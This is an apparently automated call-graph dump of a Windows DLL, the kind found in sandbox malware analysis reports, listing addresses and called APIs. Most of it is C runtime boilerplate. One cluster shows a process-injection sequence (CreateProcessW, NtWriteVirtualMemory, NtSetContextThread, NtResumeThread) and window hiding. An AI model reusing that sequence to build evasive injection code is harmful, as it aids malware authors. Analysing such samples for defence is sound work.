10005 6cd9b30d ___scrt_uninitialize_crt WideCharToMultiByte 10002->10005 10003->9999 10012 6cd98f9f 10003->10012 10004->10003 10006 6cd9b42b 10005->10006 10006->10001 10007 6cd9c38c 15 API calls 10006->10007 10008 6cd9b43b 10007->10008 10009 6cd9b453 10008->10009 10010 6cd9b30d ___scrt_uninitialize_crt WideCharToMultiByte 10008->10010 10011 6cd9a013 _free 14 API calls 10009->10011 10010->10009 10011->10001 10013 6cd98fb4 10012->10013 10014 6cd99fb6 _free 14 API calls 10013->10014 10015 6cd98fdb 10014->10015 10016 6cd99040 10015->10016 10019 6cd99fb6 _free 14 API calls 10015->10019 10020 6cd99042 10015->10020 10025 6cd99062 10015->10025 10027 6cd9a013 _free 14 API calls 10015->10027 10029 6cd9949f 10015->10029 10017 6cd9a013 _free 14 API calls 10016->10017 10018 6cd98f75 10017->10018 10018->9998 10019->10015 10021 6cd9906f 14 API calls 10020->10021 10023 6cd99048 10021->10023 10024 6cd9a013 _free 14 API calls 10023->10024 10024->10016 10026 6cd99ef6 __fassign 11 API calls 10025->10026 10028 6cd9906e 10026->10028 10027->10015 10030 6cd994ba 10029->10030 10031 6cd994ac 10029->10031 10032 6cd99fa3 _free 14 API calls 10030->10032 10031->10030 10036 6cd994d1 10031->10036 10033 6cd994c2 10032->10033 10034 6cd99ee6 __fassign 25 API calls 10033->10034 10035 6cd994cc 10034->10035 10035->10015 10036->10035 10037 6cd99fa3 _free 14 API calls 10036->10037 10037->10033 9907 6cd9cfc1 9909 6cd9cf0e 9907->9909 9908 6cd9cf26 9910 6cd9cf3a 9908->9910 9911 6cd99fa3 _free 14 API calls 9908->9911 9909->9908 9909->9910 9914 6cd9cf5e 9909->9914 9912 6cd9cf30 9911->9912 9913 6cd99ee6 __fassign 25 API calls 9912->9913 9913->9910 9914->9910 9915 6cd99fa3 _free 14 API calls 9914->9915 9915->9912 8990 6cd936c0 9015 6cd936e0 __DllMainCRTStartup@12 8990->9015 8991 6cd94803 CreateProcessW 8991->9015 8992 6cd95ff8 NtSetContextThread NtResumeThread 8992->9015 8993 6cd9566a NtReadVirtualMemory 8993->9015 8994 6cd94a36 NtAllocateVirtualMemory 8994->9015 8995 6cd9487a NtGetContextThread 8995->9015 8996 6cd95f64 NtCreateThreadEx 8996->9015 8998 6cd95783 NtWriteVirtualMemory 8998->9015 8999 6cd94ac4 NtWriteVirtualMemory 8999->9015 9000 6cd95a15 NtWriteVirtualMemory 9000->9015 9001 6cd960db GetConsoleWindow ShowWindow 9002 6cd91200 23 API calls 9001->9002 9006 6cd96108 9002->9006 9003 6cd91200 23 API calls 9003->9006 9004 6cd91000 5 API calls 9004->9006 9005 6cd94f25 NtWriteVirtualMemory 9052 6cd93470 9005->9052 9006->9003 9006->9004 9006->9015 9008 6cd94638 VirtualAlloc 9008->9015 9009 6cd94cc4 NtWriteVirtualMemory 9009->9015 9010 6cd960c9 9011 6cd96b60 _ValidateLocalCookies 5 API calls 9010->9011 9012 6cd960d3 9011->9012 9013 6cd942aa GetConsoleWindow ShowWindow 9020 6cd91200 9013->9020 9015->8991 9015->8992 9015->8993 9015->8994 9015->8995 9015->8996 9015->8998 9015->8999 9015->9000 9015->9001 9015->9005 9015->9008 9015->9009 9015->9010 9015->9013 9016 6cd91200 23 API calls 9015->9016 9018 6cd9608b CloseHandle CloseHandle 9015->9018 9019 6cd949c1 NtAllocateVirtualMemory 9015->9019 9043 6cd92e60 9015->9043 9056 6cd91000 9015->9056 9016->9015 9018->9015 9019->9015 9028 6cd91228 ___scrt_uninitialize_crt 9020->9028 9021 6cd91850 GetCurrentProcess 9060 6cd97790 9021->9060 9024 6cd91d1b MapViewOfFile 9024->9028 9025 6cd919c5 K32GetModuleInformation 9025->9028 9026 6cd91b04 CreateFileMappingA 9026->9028 9027 6cd9259c 9029 6cd96b60 _ValidateLocalCookies 5 API calls 9027->9029 9028->9021 9028->9024 9028->9025 9028->9026 9028->9027 9030 6cd91c9d CloseHandle 9028->9030 9032 6cd91a5c GetModuleFileNameA CreateFileA 9028->9032 9033 6cd9256a CloseHandle CloseHandle 9028->9033 9034 6cd92530 CloseHandle 9028->9034 9035 6cd92675 MapViewOfFile 9028->9035 9036 6cd9220a VirtualProtect 9028->9036 9037 6cd920da VirtualProtect 9028->9037 9038 6cd92620 K32GetModuleInformation 9028->9038 9039 6cd926d8 VirtualProtect 9028->9039 9040 6cd925ad GetCurrentProcess 9028->9040 9031 6cd925a6 9029->9031 9030->9028 9031->9015 9032->9028 9033->9028 9034->9028 9035->9028 9036->9028 9037->9028 9038->9028 9039->9028 9041 6cd97790 __DllMainCRTStartup@12 9040->9041 9042 6cd925ec GetModuleHandleA 9041->9042 9042->9028 9045 6cd92e7f 9043->9045 9044 6cd933ed 9046 6cd96b60 _ValidateLocalCookies 5 API calls 9044->9046 9045->9044 9047 6cd930c9 NtQueryInformationProcess 9045->9047 9049 6cd93016 GetModuleHandleW 9045->9049 9048 6cd933fd 9046->9048 9047->9045 9048->9015 9062 6cd92790 9049->9062 9051 6cd93042 __DllMainCRTStartup@12 9051->9045 9053 6cd934cf 9052->9053 9054 6cd96b60 _ValidateLocalCookies 5 API calls 9053->9054 9055 6cd93699 9054->9055 9055->9015 9057 6cd9105f 9056->9057 9058 6cd96b60 _ValidateLocalCookies 5 API calls 9057->9058 9059 6cd911dd 9058->9059 9059->9015 9061 6cd918a1 GetModuleHandleA 9060->9061 9061->9028 9063 6cd927b6 9062->9063 9064 6cd96b60 _ValidateLocalCookies 5 API calls 9063->9064 9065 6cd92e23 9064->9065 9065->9051 9810 6cd96e43 ___scrt_dllmain_exception_filter 10038 6cd99344 10039 6cd9a013 _free 14 API calls 10038->10039 10040 6cd99352 10039->10040 10041 6cd9a013 _free 14 API calls 10040->10041 10042 6cd99365 10041->10042 10043 6cd9a013 _free 14 API calls 10042->10043 10044 6cd99376 10043->10044 10045 6cd9a013 _free 14 API calls 10044->10045 10046 6cd99387 10045->10046 9118 6cd990c7 9119 6cd990d9 9118->9119 9121 6cd990df 9118->9121 9122 6cd9906f 9119->9122 9126 6cd9907c 9122->9126 9127 6cd99099 9122->9127 9123 6cd99093 9125 6cd9a013 _free 14 API calls 9123->9125 9124 6cd9a013 _free 14 API calls 9124->9126 9125->9127 9126->9123 9126->9124 9127->9121 9811 6cd9b278 GetCommandLineA GetCommandLineW 9134 6cd9a4fd 9135 6cd9a50e 9134->9135 9136 6cd96b60 _ValidateLocalCookies 5 API calls 9135->9136 9137 6cd9a6f8 9136->9137 9812 6cd99474 9813 6cd99477 9812->9813 9814 6cd994f9 __fassign 37 API calls 9813->9814 9815 6cd99483 9814->9815 9816 6cd99c69 9817 6cd99c74 9816->9817 9818 6cd9b7e2 6 API calls 9817->9818 9819 6cd99c9d 9817->9819 9820 6cd99c99 9817->9820 9818->9817 9822 6cd99cc1 9819->9822 9823 6cd99cce 9822->9823 9825 6cd99ced 9822->9825 9824 6cd99cd8 DeleteCriticalSection 9823->9824 9824->9824 9824->9825 9825->9820 8652 6cd96b6e 8653 6cd96b79 8652->8653 8654 6cd96bac 8652->8654 8656 6cd96b9e 8653->8656 8657 6cd96b7e 8653->8657 8655 6cd96cc8 __DllMainCRTStartup@12 84 API calls 8654->8655 8663 6cd96b88 8655->8663 8664 6cd96bc1 8656->8664 8659 6cd96b83 8657->8659 8660 6cd96b94 8657->8660 8659->8663 8678 6cd9719a 8659->8678 8683 6cd9717b 8660->8683 8665 6cd96bcd ___scrt_is_nonwritable_in_current_image 8664->8665 8691 6cd9720b 8665->8691 8667 6cd96bd4 __DllMainCRTStartup@12 8668 6cd96bfb 8667->8668 8669 6cd96cc0 8667->8669 8675 6cd96c37 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 8667->8675 8702 6cd9716d 8668->8702 8671 6cd973aa __DllMainCRTStartup@12 4 API calls 8669->8671 8672 6cd96cc7 8671->8672 8673 6cd96c0a __RTC_Initialize 8673->8675 8705 6cd9708b InitializeSListHead 8673->8705 8675->8663 8676 6cd96c18 8676->8675 8706 6cd97142 8676->8706 8767 6cd993fe 8678->8767 8970 6cd98050 8683->8970 8688 6cd97197 8688->8663 8689 6cd9805b 21 API calls 8690 6cd97184 8689->8690 8690->8663 8692 6cd97214 8691->8692 8710 6cd97578 IsProcessorFeaturePresent 8692->8710 8696 6cd97225 8701 6cd97229 8696->8701 8720 6cd993e1 8696->8720 8698 6cd97240 8698->8667 8700 6cd98066 ___scrt_uninitialize_crt 7 API calls 8700->8701 8701->8667 8761 6cd97244 8702->8761 8704 6cd97174 8704->8673 8705->8676 8707 6cd97147 ___scrt_release_startup_lock 8706->8707 8708 6cd97578 IsProcessorFeaturePresent 8707->8708 8709 6cd97150 8707->8709 8708->8709 8709->8675 8711 6cd97220 8710->8711 8712 6cd98031 8711->8712 8723 6cd98467 8712->8723 8715 6cd9803a 8715->8696 8717 6cd98042 8718 6cd9804d 8717->8718 8719 6cd984a3 ___vcrt_uninitialize_locks DeleteCriticalSection 8717->8719 8718->8696 8719->8715 8752 6cd9bb2d 8720->8752 8724 6cd98470 8723->8724 8726 6cd98499 8724->8726 8727 6cd98036 8724->8727 8737 6cd986d5 8724->8737 8728 6cd984a3 ___vcrt_uninitialize_locks DeleteCriticalSection 8726->8728 8727->8715 8729 6cd98419 8727->8729 8728->8727 8742 6cd985e6 8729->8742 8733 6cd98449 8733->8717 8735 6cd9844c ___vcrt_uninitialize_ptd 6 API calls 8736 6cd9842e 8735->8736 8736->8717 8738 6cd9859d ___vcrt_FlsFree 5 API calls 8737->8738 8739 6cd986ef 8738->8739 8740 6cd986f8 8739->8740 8741 6cd9870d InitializeCriticalSectionAndSpinCount 8739->8741 8740->8724 8741->8740 8743 6cd9859d ___vcrt_FlsFree 5 API calls 8742->8743 8744 6cd98600 8743->8744 8745 6cd98619 TlsAlloc 8744->8745 8746 6cd98423 8744->8746 8746->8736 8747 6cd98697 8746->8747 8748 6cd9859d ___vcrt_FlsFree 5 API calls 8747->8748 8749 6cd986b1 8748->8749 8750 6cd986cc TlsSetValue 8749->8750 8751 6cd9843c 8749->8751 8750->8751 8751->8733 8751->8735 8753 6cd9bb3d 8752->8753 8754 6cd97232 8752->8754 8753->8754 8756 6cd9b9ed 8753->8756 8754->8698 8754->8700 8757 6cd9b9f4 8756->8757 8758 6cd9ba37 GetStdHandle 8757->8758 8759 6cd9ba9d 8757->8759 8760 6cd9ba4a GetFileType 8757->8760 8758->8757 8759->8753 8760->8757 8762 6cd97250 8761->8762 8763 6cd97254 8761->8763 8762->8704 8764 6cd973aa __DllMainCRTStartup@12 4 API calls 8763->8764 8766 6cd97261 ___scrt_release_startup_lock 8763->8766 8765 6cd972ca 8764->8765 8766->8704 8773 6cd999eb 8767->8773 8770 6cd9805b 8953 6cd98343 8770->8953 8774 6cd999f5 8773->8774 8775 6cd9719f 8773->8775 8776 6cd9b761 _free 6 API calls 8774->8776 8775->8770 8777 6cd999fc 8776->8777 8777->8775 8778 6cd9b7a0 _free 6 API calls 8777->8778 8779 6cd99a0f 8778->8779 8781 6cd998b2 8779->8781 8782 6cd998bd 8781->8782 8783 6cd998cd 8781->8783 8787 6cd998d3 8782->8787 8783->8775 8786 6cd9a013 _free 14 API calls 8786->8783 8788 6cd998e8 8787->8788 8789 6cd998ee 8787->8789 8791 6cd9a013 _free 14 API calls 8788->8791 8790 6cd9a013 _free 14 API calls 8789->8790 8792 6cd998fa 8790->8792 8791->8789 8793 6cd9a013 _free 14 API calls 8792->8793 8794 6cd99905 8793->8794 8795 6cd9a013 _free 14 API calls 8794->8795 8796 6cd99910 8795->8796 8797 6cd9a013 _free 14 API calls 8796->8797 8798 6cd9991b 8797->8798 8799 6cd9a013 _free 14 API calls 8798->8799 8800 6cd99926 8799->8800 8801 6cd9a013 _free 14 API calls 8800->8801 8802 6cd99931 8801->8802 8803 6cd9a013 _free 14 API calls 8802->8803 8804 6cd9993c 8803->8804 8805 6cd9a013 _free 14 API calls 8804->8805 8806 6cd99947 8805->8806 8807 6cd9a013 _free 14 API calls 8806->8807 8808 6cd99955 8807->8808 8813 6cd996ff 8808->8813 8814 6cd9970b ___scrt_is_nonwritable_in_current_image 8813->8814 8829 6cd99caa EnterCriticalSection 8814->8829 8816 6cd99715 8819 6cd9a013 _free 14 API calls 8816->8819 8820 6cd9973f 8816->8820 8819->8820 8830 6cd9975e 8820->8830 8821 6cd9976a 8822 6cd99776 ___scrt_is_nonwritable_in_current_image 8821->8822 8834 6cd99caa EnterCriticalSection 8822->8834 8824 6cd99780 8835 6cd999a0 8824->8835 8826 6cd99793 8839 6cd997b3 8826->8839 8829->8816 8833 6cd99cf2 LeaveCriticalSection 8830->8833 8832 6cd9974c 8832->8821 8833->8832 8834->8824 8836 6cd999d6 __fassign 8835->8836 8837 6cd999af __fassign 8835->8837 8836->8826 8837->8836 8842 6cd9c6f8 8837->8842 8952 6cd99cf2 LeaveCriticalSection 8839->8952 8841 6cd997a1 8841->8786 8843 6cd9c778 8842->8843 8846 6cd9c70e 8842->8846 8845 6cd9a013 _free 14 API calls 8843->8845 8867 6cd9c7c6 8843->8867 8847 6cd9c79a 8845->8847 8846->8843 8849 6cd9a013 _free 14 API calls 8846->8849 8863 6cd9c741 8846->8863 8848 6cd9a013 _free 14 API calls 8847->8848 8850 6cd9c7ad 8848->8850 8852 6cd9c736 8849->8852 8853 6cd9a013 _free 14 API calls 8850->8853 8851 6cd9a013 _free 14 API calls 8855 6cd9c76d 8851->8855 8870 6cd9e627 8852->8870 8859 6cd9c7bb 8853->8859 8854 6cd9a013 _free 14 API calls 8860 6cd9c758 8854->8860 8861 6cd9a013 _free 14 API calls 8855->8861 8856 6cd9c834 8857 6cd9a013 _free 14 API calls 8856->8857 8862 6cd9c83a 8857->8862 8864 6cd9a013 _free 14 API calls 8859->8864 8898 6cd9e725 8860->8898 8861->8843 8862->8836 8863->8854 8868 6cd9c763 8863->8868 8864->8867 8866 6cd9a013 14 API calls _free 8869 6cd9c7d4 8866->8869 8910 6cd9c869 8867->8910 8868->8851 8869->8856 8869->8866 8871 6cd9e638 8870->8871 8897 6cd9e721 8870->8897 8872 6cd9e649 8871->8872 8874 6cd9a013 _free 14 API calls 8871->8874 8873 6cd9e65b 8872->8873 8875 6cd9a013 _free 14 API calls 8872->8875 8876 6cd9e66d 8873->8876 8877 6cd9a013 _free 14 API calls 8873->8877 8874->8872 8875->8873 8878 6cd9e67f 8876->8878 8879 6cd9a013 _free 14 API calls 8876->8879 8877->8876 8880 6cd9e691 8878->8880 8881 6cd9a013 _free 14 API calls 8878->8881 8879->8878 8882 6cd9a013 _free 14 API calls 8880->8882 8884 6cd9e6a3 8880->8884 8881->8880 8882->8884 8883 6cd9e6b5 8886 6cd9e6c7 8883->8886 8887 6cd9a013 _free 14 API calls 8883->8887 8884->8883 8885 6cd9a013 _free 14 API calls 8884->8885 8885->8883 8888 6cd9e6d9 8886->8888 8890 6cd9a013 _free 14 API calls 8886->8890 8887->8886 8889 6cd9e6eb 8888->8889 8891 6cd9a013 _free 14 API calls 8888->8891 8892 6cd9e6fd 8889->8892 8893 6cd9a013 _free 14 API calls 8889->8893 8890->8888 8891->8889 8894 6cd9e70f 8892->8894 8895 6cd9a013 _free 14 API calls 8892->8895 8893->8892 8896 6cd9a013 _free 14 API calls 8894->8896 8894->8897 8895->8894 8896->8897 8897->8863 8899 6cd9e732 8898->8899 8909 6cd9e78a 8898->8909 8900 6cd9e742 8899->8900 8901 6cd9a013 _free 14 API calls 8899->8901 8902 6cd9a013 _free 14 API calls 8900->8902 8904 6cd9e754 8900->8904 8901->8900 8902->8904 8903 6cd9e766 8906 6cd9a013 _free 14 API calls 8903->8906 8907 6cd9e778 8903->8907 8904->8903 8905 6cd9a013 _free 14 API calls 8904->8905 8905->8903 8906->8907 8908 6cd9a013 _free 14 API calls 8907->8908 8907->8909 8908->8909 8909->8868 8911 6cd9c876 8910->8911 8915 6cd9c895 8910->8915 8911->8915 8916 6cd9e7c6 8911->8916 8914 6cd9a013 _free 14 API calls 8914->8915 8915->8869 8917 6cd9c88f 8916->8917 8918 6cd9e7d7 8916->8918 8917->8914 8919 6cd9e78e __fassign 14 API calls 8918->8919 8920 6cd9e7df 8919->8920 8921 6cd9e78e __fassign 14 API calls 8920->8921 8922 6cd9e7ea 8921->8922 8923 6cd9e78e __fassign 14 API calls 8922->8923 8924 6cd9e7f5 8923->8924 8925 6cd9e78e __fassign 14 API calls 8924->8925 8926 6cd9e800 8925->8926 8927 6cd9e78e __fassign 14 API calls 8926->8927 8928 6cd9e80e 8927->8928 8929 6cd9a013 _free 14 API calls 8928->8929 8930 6cd9e819 8929->8930 8931 6cd9a013 _free 14 API calls 8930->8931 8932 6cd9e824 8931->8932 8933 6cd9a013 _free 14 API calls 8932->8933 8934 6cd9e82f 8933->8934 8935 6cd9e78e __fassign 14 API calls 8934->8935 8936 6cd9e83d 8935->8936 8937 6cd9e78e __fassign 14 API calls 8936->8937 8938 6cd9e84b 8937->8938 8939 6cd9e78e __fassign 14 API calls 8938->8939 8940 6cd9e85c 8939->8940 8941 6cd9e78e __fassign 14 API calls 8940->8941 8942 6cd9e86a 8941->8942 8943 6cd9e78e __fassign 14 API calls 8942->8943 8944 6cd9e878 8943->8944 8945 6cd9a013 _free 14 API calls 8944->8945 8946 6cd9e883 8945->8946 8947 6cd9a013 _free 14 API calls 8946->8947 8948 6cd9e88e 8947->8948 8949 6cd9a013 _free 14 API calls 8948->8949 8950 6cd9e899 8949->8950 8951 6cd9a013 _free 14 API calls 8950->8951 8951->8917 8952->8841 8954 6cd98350 8953->8954 8955 6cd971a4 8953->8955 8956 6cd9835e 8954->8956 8961 6cd9865c 8954->8961 8955->8663 8958 6cd98697 ___vcrt_FlsSetValue 6 API calls 8956->8958 8959 6cd9836e 8958->8959 8966 6cd98327 8959->8966 8962 6cd9859d ___vcrt_FlsFree 5 API calls 8961->8962 8963 6cd98676 8962->8963 8964 6cd9868e TlsGetValue 8963->8964 8965 6cd98682 8963->8965 8964->8965 8965->8956 8967 6cd98331 8966->8967 8969 6cd9833e 8966->8969 8968 6cd99484 ___vcrt_freefls@4 14 API calls 8967->8968 8967->8969 8968->8969 8969->8955 8976 6cd98387 8970->8976 8972 6cd97180 8972->8690 8973 6cd993f3 8972->8973 8974 6cd99b6e _free 14 API calls 8973->8974 8975 6cd9718c 8974->8975 8975->8688 8975->8689 8977 6cd98390 8976->8977 8978 6cd98393 GetLastError 8976->8978 8977->8972 8979 6cd9865c ___vcrt_FlsGetValue 6 API calls 8978->8979 8980 6cd983a8 8979->8980 8981 6cd983c7 8980->8981 8982 6cd9840d SetLastError 8980->8982 8983 6cd98697 ___vcrt_FlsSetValue 6 API calls 8980->8983 8981->8982 8982->8972 8984 6cd983c1 8983->8984 8984->8981 8985 6cd983e9 8984->8985 8986 6cd98697 ___vcrt_FlsSetValue 6 API calls 8984->8986 8987 6cd98697 ___vcrt_FlsSetValue 6 API calls 8985->8987 8988 6cd983fd 8985->8988 8986->8985 8987->8988 8989 6cd99484 ___vcrt_freefls@4 14 API calls 8988->8989 8989->8981 9138 6cd992ee 9141 6cd990fd 9138->9141 9142 6cd9910c 9141->9142 9143 6cd9906f 14 API calls 9142->9143 9144 6cd99126 9143->9144 9145 6cd9906f 14 API calls 9144->9145 9146 6cd99131 9145->9146 9147 6cd990e2 9148 6cd990fa 9147->9148 9149 6cd990f4 9147->9149 9150 6cd9906f 14 API calls 9149->9150 9150->9148 9151 6cd980e5 9154 6cd98133 9151->9154 9155 6cd980f0 9154->9155 9156 6cd9813c 9154->9156 9156->9155 9163 6cd98379 9156->9163 9158 6cd98177 9159 6cd98379 47 API calls 9158->9159 9160 6cd98182 9159->9160 9176 6cd99448 9160->9176 9164 6cd98387 23 API calls 9163->9164 9165 6cd9837e 9164->9165 9165->9158 9182 6cd9bd2c 9165->9182 9169 6cd99513 IsProcessorFeaturePresent 9173 6cd9951f 9169->9173 9170 6cd99532 9218 6cd98c2b 9170->9218 9172 6cd99509 9172->9169 9172->9170 9212 6cd99d3a 9173->9212 9177 6cd99454 ___scrt_is_nonwritable_in_current_image 9176->9177 9178 6cd99a17 __fassign 37 API calls 9177->9178 9179 6cd99459 9178->9179 9180 6cd994f9 __fassign 37 API calls 9179->9180 9181 6cd99483 9180->9181 9221 6cd9bc5e 9182->9221 9185 6cd9bd71 9186 6cd9bd7d ___scrt_is_nonwritable_in_current_image 9185->9186 9187 6cd99b6e _free 14 API calls 9186->9187 9191 6cd9bdaa __fassign 9186->9191 9192 6cd9bda4 __fassign 9186->9192 9187->9192 9188 6cd9bdf1 9189 6cd99fa3 _free 14 API calls 9188->9189 9190 6cd9bdf6 9189->9190 9232 6cd99ee6 9190->9232 9194 6cd9be1d 9191->9194 9235 6cd99caa EnterCriticalSection 9191->9235 9192->9188 9192->9191 9195 6cd9bddb 9192->9195 9198 6cd9be5f 9194->9198 9200 6cd9bf50 9194->9200 9209 6cd9be8e 9194->9209 9195->9172 9198->9209 9236 6cd99a17 GetLastError 9198->9236 9199 6cd9bf5b 9203 6cd98c2b __fassign 23 API calls 9199->9203 9200->9199 9267 6cd99cf2 LeaveCriticalSection 9200->9267 9205 6cd9bf63 9203->9205 9206 6cd99a17 __fassign 37 API calls 9210 6cd9bee3 9206->9210 9208 6cd99a17 __fassign 37 API calls 9208->9209 9263 6cd9befd 9209->9263 9210->9195 9211 6cd99a17 __fassign 37 API calls 9210->9211 9211->9195 9213 6cd99d56 __DllMainCRTStartup@12 9212->9213 9214 6cd99d82 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9213->9214 9216 6cd99e53 __DllMainCRTStartup@12 9214->9216 9215 6cd96b60 _ValidateLocalCookies 5 API calls 9217 6cd99e71 9215->9217 9216->9215 9217->9170 9219 6cd98ad1 __DllMainCRTStartup@12 23 API calls 9218->9219 9220 6cd98c3c 9219->9220 9222 6cd9bc6a ___scrt_is_nonwritable_in_current_image 9221->9222 9227 6cd99caa EnterCriticalSection 9222->9227 9224 6cd9bc78 9228 6cd9bcb6 9224->9228 9227->9224 9231 6cd99cf2 LeaveCriticalSection 9228->9231 9230 6cd994fe 9230->9172 9230->9185 9231->9230 9268 6cd99e82 9232->9268 9234 6cd99ef2 9234->9195 9235->9194 9237 6cd99a34 9236->9237 9238 6cd99a2e 9236->9238 9240 6cd9b7a0 _free 6 API calls 9237->9240 9260 6cd99a3a SetLastError 9237->9260 9239 6cd9b761 _free 6 API calls 9238->9239 9239->9237 9241 6cd99a52 9240->9241 9242 6cd99fb6 _free 14 API calls 9241->9242 9241->9260 9243 6cd99a62 9242->9243 9245 6cd99a6a 9243->9245 9246 6cd99a81 9243->9246 9249 6cd9b7a0 _free 6 API calls 9245->9249 9251 6cd9b7a0 _free 6 API calls 9246->9251 9247 6cd99ac8 9247->9208 9248 6cd99ace 9280 6cd994f9 9248->9280 9261 6cd99a78 9249->9261 9253 6cd99a8d 9251->9253 9254 6cd99a91 9253->9254 9255 6cd99aa2 9253->9255 9258 6cd9b7a0 _free 6 API calls 9254->9258 9256 6cd99819 _free 14 API calls 9255->9256 9259 6cd99aad 9256->9259 9257 6cd9a013 _free 14 API calls 9257->9260 9258->9261 9262 6cd9a013 _free 14 API calls 9259->9262 9260->9247 9260->9248 9261->9257 9262->9260 9264 6cd9bf03 9263->9264 9266 6cd9bed4 9263->9266 9291 6cd99cf2 LeaveCriticalSection 9264->9291 9266->9195 9266->9206 9266->9210 9267->9199 9269 6cd99b6e _free 14 API calls 9268->9269 9270 6cd99e8d 9269->9270 9273 6cd99e9b 9270->9273 9276 6cd99ef6 IsProcessorFeaturePresent 9270->9276 9272 6cd99ee5 9274 6cd99e82 __fassign 25 API calls 9272->9274 9273->9234 9275 6cd99ef2 9274->9275 9275->9234 9277 6cd99f02 9276->9277 9278 6cd99d3a __fassign 8 API calls 9277->9278 9279 6cd99f17 GetCurrentProcess TerminateProcess 9278->9279 9279->9272 9281 6cd9bd2c __fassign 2 API calls 9280->9281 9282 6cd994fe 9281->9282 9283 6cd99509 9282->9283 9284 6cd9bd71 __fassign 36 API calls 9282->9284 9285 6cd99513 IsProcessorFeaturePresent 9283->9285 9290 6cd99532 9283->9290 9284->9283 9287 6cd9951f 9285->9287 9286 6cd98c2b __fassign 23 API calls 9289 6cd9953c 9286->9289 9288 6cd99d3a __fassign 8 API calls 9287->9288 9288->9290 9290->9286 9291->9266 9292 6cd9b8e6 9293 6cd9b917 9292->9293 9294 6cd9b8f1 9292->9294 9294->9293 9295 6cd9b901 FreeLibrary 9294->9295 9295->9294 9916 6cd9a1e6 9919 6cd9a065 9916->9919 9920 6cd9a08d 9919->9920 9921 6cd9a073 9919->9921 9922 6cd9a0b3 9920->9922 9923 6cd9a094 9920->9923 9937 6cd9a739 9921->9937 9925 6cd9b291 __fassign MultiByteToWideChar 9922->9925 9936 6cd9a07d 9923->9936 9941 6cd9a78f 9923->9941 9927 6cd9a0c2 9925->9927 9928 6cd9a0c9 GetLastError 9927->9928 9929 6cd9a0ef 9927->9929 9931 6cd9a78f 15 API calls 9927->9931 9930 6cd99f6d __dosmaperr 14 API calls 9928->9930 9932 6cd9b291 __fassign MultiByteToWideChar 9929->9932 9929->9936 9933 6cd9a0d5 9930->9933 9931->9929 9934 6cd9a106 9932->9934 9935 6cd99fa3 _free 14 API calls 9933->9935 9934->9928 9934->9936 9935->9936 9938 6cd9a74c 9937->9938 9939 6cd9a744 9937->9939 9938->9936 9940 6cd9a013 _free 14 API calls 9939->9940 9940->9938 9942 6cd9a739 14 API calls 9941->9942 9943 6cd9a79d 9942->9943 9946 6cd9a7ce 9943->9946 9947 6cd9c38c 15 API calls 9946->9947 9948 6cd9a7ae 9947->9948 9948->9936 10047 6cd9c318 10048 6cd9c247 ___scrt_uninitialize_crt 66 API calls 10047->10048 10049 6cd9c320 10048->10049 10057 6cd9e326 10049->10057 10051 6cd9c325 10067 6cd9e3d1 10051->10067 10054 6cd9c34f 10055 6cd9a013 _free 14 API calls 10054->10055 10056 6cd9c35a 10055->10056 10058 6cd9e332 ___scrt_is_nonwritable_in_current_image 10057->10058 10071 6cd99caa EnterCriticalSection 10058->10071 10060 6cd9e3a9 10085 6cd9e3c8 10060->10085 10063 6cd9e37d DeleteCriticalSection 10064 6cd9a013 _free 14 API calls 10063->10064 10066 6cd9e33d 10064->10066 10066->10060 10066->10063 10072 6cd9ea5b 10066->10072 10068 6cd9e3e8 10067->10068 10070 6cd9c334 DeleteCriticalSection 10067->10070 10069 6cd9a013 _free 14 API calls 10068->10069 10068->10070 10069->10070 10070->10051 10070->10054 10071->10066 10073 6cd9ea67 ___scrt_is_nonwritable_in_current_image 10072->10073 10074 6cd9ea71 10073->10074 10075 6cd9ea86 10073->10075 10076 6cd99fa3 _free 14 API calls 10074->10076 10081 6cd9ea81 10075->10081 10088 6cd9c364 EnterCriticalSection 10075->10088 10077 6cd9ea76 10076->10077 10079 6cd99ee6 __fassign 25 API calls 10077->10079 10079->10081 10080 6cd9eaa3 10089 6cd9e9e4 10080->10089 10081->10066 10083 6cd9eaae 10105 6cd9ead5 10083->10105 10177 6cd99cf2 LeaveCriticalSection 10085->10177 10087 6cd9e3b5 10087->10051 10088->10080 10090 6cd9e9f1 10089->10090 10091 6cd9ea06 10089->10091 10092 6cd99fa3 _free 14 API calls 10090->10092 10093 6cd9c19a ___scrt_uninitialize_crt 62 API calls 10091->10093 10097 6cd9ea01 10091->10097 10094 6cd9e9f6 10092->10094 10095 6cd9ea1b 10093->10095 10096 6cd99ee6 __fassign 25 API calls 10094->10096 10098 6cd9e3d1 14 API calls 10095->10098 10096->10097 10097->10083 10099 6cd9ea23 10098->10099 10100 6cd9c590 ___scrt_uninitialize_crt 25 API calls 10099->10100 10101 6cd9ea29 10100->10101 10108 6cd9f057 10101->10108 10104 6cd9a013 _free 14 API calls 10104->10097 10176 6cd9c378 LeaveCriticalSection 10105->10176 10107 6cd9eadd 10107->10081 10109 6cd9f068 10108->10109 10110 6cd9f07d 10108->10110 10112 6cd99f90 __dosmaperr 14 API calls 10109->10112 10111 6cd9f0c6 10110->10111 10116 6cd9f0a4 10110->10116 10114 6cd99f90 __dosmaperr 14 API calls 10111->10114 10113 6cd9f06d 10112->10113 10115 6cd99fa3 _free 14 API calls 10113->10115 10117 6cd9f0cb 10114->10117 10121 6cd9ea2f 10115->10121 10123 6cd9efcb 10116->10123 10119 6cd99fa3 _free 14 API calls 10117->10119 10120 6cd9f0d3 10119->10120 10122 6cd99ee6 __fassign 25 API calls 10120->10122 10121->10097 10121->10104 10122->10121 10124 6cd9efd7 ___scrt_is_nonwritable_in_current_image 10123->10124 10134 6cd9d67f EnterCriticalSection 10124->10134 10126 6cd9efe5 10127 6cd9f00c 10126->10127 10128 6cd9f017 10126->10128 10135 6cd9f0e4 10127->10135 10130 6cd99fa3 _free 14 API calls 10128->10130 10131 6cd9f012 10130->10131 10150 6cd9f04b 10131->10150 10134->10126 10153 6cd9d756 10135->10153 10137 6cd9f0fa 10166 6cd9d6c5 10137->10166 10138 6cd9f0f4 10138->10137 10140 6cd9d756 ___scrt_uninitialize_crt 25 API calls 10138->10140 10149 6cd9f12c 10138->10149 10143 6cd9f123 10140->10143 10141 6cd9d756 ___scrt_uninitialize_crt 25 API calls 10144 6cd9f138 CloseHandle 10141->10144 10146 6cd9d756 ___scrt_uninitialize_crt 25 API calls 10143->10146 10144->10137 10147 6cd9f144 GetLastError 10144->10147 10145 6cd99f6d __dosmaperr 14 API calls 10148 6cd9f174 10145->10148 10146->10149 10147->10137 10148->10131 10149->10137 10149->10141 10175 6cd9d6a2 LeaveCriticalSection 10150->10175 10152 6cd9f034 10152->10121 10154 